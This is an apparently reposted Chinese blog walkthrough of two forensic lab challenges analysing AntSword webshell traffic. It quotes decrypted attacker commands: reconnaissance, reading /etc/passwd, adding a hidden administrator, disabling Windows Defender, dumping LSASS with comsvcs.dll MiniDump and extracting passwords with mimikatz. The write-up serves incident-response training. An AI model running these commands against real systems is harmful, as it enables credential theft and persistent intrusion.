玄机 流量分析篇

admin 2024年9月28日11:50:28评论5 views字数 4013阅读13分22秒阅读模式

第六章 流量特征分析-蚁剑流量分析

flag1 : ⽊⻢的连接密码是什么
flag2 : ⿊客执⾏的第⼀个命令是什么
flag3 : ⿊客读取了哪个⽂件的内容,提交⽂件绝对路径
flag4 : ⿊客上传了什么⽂件到服务器,提交⽂件名
flag5 : ⿊客上传的⽂件内容是什么
flag6 : ⿊客下载了哪个⽂件,提交⽂件绝对路径

在正式做题之前,我们先对蚁剑的流量进⾏解密:

cd "/var/www/html";id;echo e124bc;pwd;echo 43523
cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523 .
/var/www/html/flag.txt .
/var/www/html/7
/var/www/html/config.php

flag1:⽊⻢的连接密码是什么 我们随便找个数据包,查看连接密码:

玄机 流量分析篇

flag2:⿊客执⾏的第⼀个命令是什么 将第⼀个数据包中的特定字段,从第⼆位索引开始 base64 解密:

玄机 流量分析篇

flag3:⿊客读取了哪个⽂件的内容,提交⽂件绝对路径 在上⾯我们解密的流量中,可以看到 cat /etc/passwd 这个读取⽂件的命令。追踪流,验证是否读取成功:

玄机 流量分析篇

flag4:⿊客⻓传了什么⽂件到服务器,提交⽂件名 蚁剑上传⽂件到服务器,默认对⽂件内容进⾏⼗六进制编码,找到对应的数据包:

玄机 流量分析篇

flag5:⿊客上传的⽂件内容是什么 对上⾯的内容进⾏⼗六进制解码即可:

玄机 流量分析篇

flag{write_flag}

flag6:⿊客下载了哪个⽂件,提交⽂件绝对路径 在上⾯的解密后的数据中,只有最后两个最可疑,观察,两个请求包及返回包:

玄机 流量分析篇

flag{/var/www/html/config.php}

总结:此靶机考察对蚁剑流量的解密,对蚁剑默认未编码的流量有⼀定的认知。

第六章 流量特征分析-蚂蚁爱上树

在此之前,先对蚁剑流量进⾏解密:

cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami /priv&echo [S]&cd&ec
ho [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&systeminfo&echo [S]&cd&ech
o [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:&echo [S]&cd&echo
[E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net group "domain group" /d
omain&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net group "domain admins" /
domain&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net view&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net share&echo [S]&cd&echo
[E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:TempOnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&copy store.php c:temp&ech
o [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&powershell -ep bypass Get-M
pComputerStatus&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:tempOnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:temp&echo [S]&cd&ech
o [E]7
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:windowssystem32&echo
[S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&dir c:windowsconfig&echo
[S]&cd&echo [E]
7
flag1:管理员Admin账号的密码是多少
从解密数据中,得到管理员Admin的密码:
flag2:LSASS.exe的程序进程ID是多少
我们寻找下载这个进程的数据包:
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user admin Password1 /a
dd&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs admin /add&echo [S]&cd&echo [E] .
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&whoami /all&echo [S]&cd&ech
o [E]7

flag1:管理员Admin账号的密码是多少 从解密数据中,得到管理员Admin的密码:

玄机 流量分析篇

flag{Password1}

flag2:LSASS.exe的程序进程ID是多少 我们寻找下载这个进程的数据包:

玄机 流量分析篇

flag{852}

注:leass.exe进程空间中,存有着机器的域、本地⽤户名和密码等重要信息。

flag3:⽤户WIN0101的密码是多少 我们将HTTP对象全部导出,降序排列找到最⼤的⽂件:

玄机 流量分析篇

从⽂件头我们可以判断此⽂件是dmp⽂件,不过要去除多余的⽂件头 e1c1709 ,后缀改为  dmp

玄机 流量分析篇

⽤mimikatz导出dmp⽂件中存储的⽤户数据:

 sekurlsa::minidump pathtoproduct2(120).dmp
sekurlsa::logonpasswords

玄机 流量分析篇

在线解密得到密码:https://www.somd5.com/

flag{admin#123}

玄机 流量分析篇

总结:此靶机考察了蚁剑流量解密,以及leass.exe进程下载及⽤户数据提取、解密。

作者 船山院士团队成员  sw0rd

原文始发于微信公众号(船山信安):玄机 流量分析篇

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:50:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   玄机 流量分析篇https://cn-sec.com/archives/3093835.html

发表评论

匿名网友 填写信息